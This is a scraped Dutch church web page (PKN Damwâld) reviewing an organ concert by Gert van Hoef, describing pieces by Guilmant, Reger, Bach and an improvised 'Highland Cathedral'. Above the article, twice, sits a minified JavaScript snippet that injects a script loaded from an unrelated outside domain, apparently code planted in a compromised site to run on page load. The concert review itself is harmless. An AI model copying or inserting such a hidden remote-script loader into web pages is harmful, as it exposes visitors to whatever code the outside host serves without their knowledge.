;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Terugblik orgelconcert Gert van Hoef - PKN Damwâld

Terugblik orgelconcert Gert van Hoef

Gepubliceerd op: maandag 9 oktober

Afgelopen zaterdagavond kon de muziekcommissie een 65-tal bezoekers welkom heten bij het orgelconcert van Gert van Hoef. Deze uit Barneveld afkomstige musicus is inmiddels bekend in binnen- en buitenland en is zeer geliefd om zijn virtuoze orgelspel en improvisatietalent.

Met muzikale overtuiging werd psalm 66 van J. Zwart als openingsstuk van het concert gespeeld. Hierna volgden zachte stemmen, die werden afgewisseld met sprankelende muziek. Met het spelen van March Triomphale van Guilmant kreeg het publiek al een voorproefje van de virtuositeit  van de organist.

Na de pauze werd het orgelconcert vervolgd met muziek van Reger, Bach en de hedendaagse componist en organist Marco den Toom. Een waterval van tonen bracht “The Arrival of the Queen of Sheba” bij het publiek. Een prachtig muziekstuk waarbij duidelijk wordt dat de koningin van Sheba groots wordt onthaald als ze koning Salomo bezoekt.

Met een ingelast verzoeknummer “Highland Cathedral” liet Gert zijn improvisatietalent zien door dit muziekstuk te combineren met het lied “Eens als de bazuinen klinken”. Een spetterend slotstuk en tevens een prachtige combinatie van registers, waarbij men het gevoel had naar doedelzak en trompet te luisteren.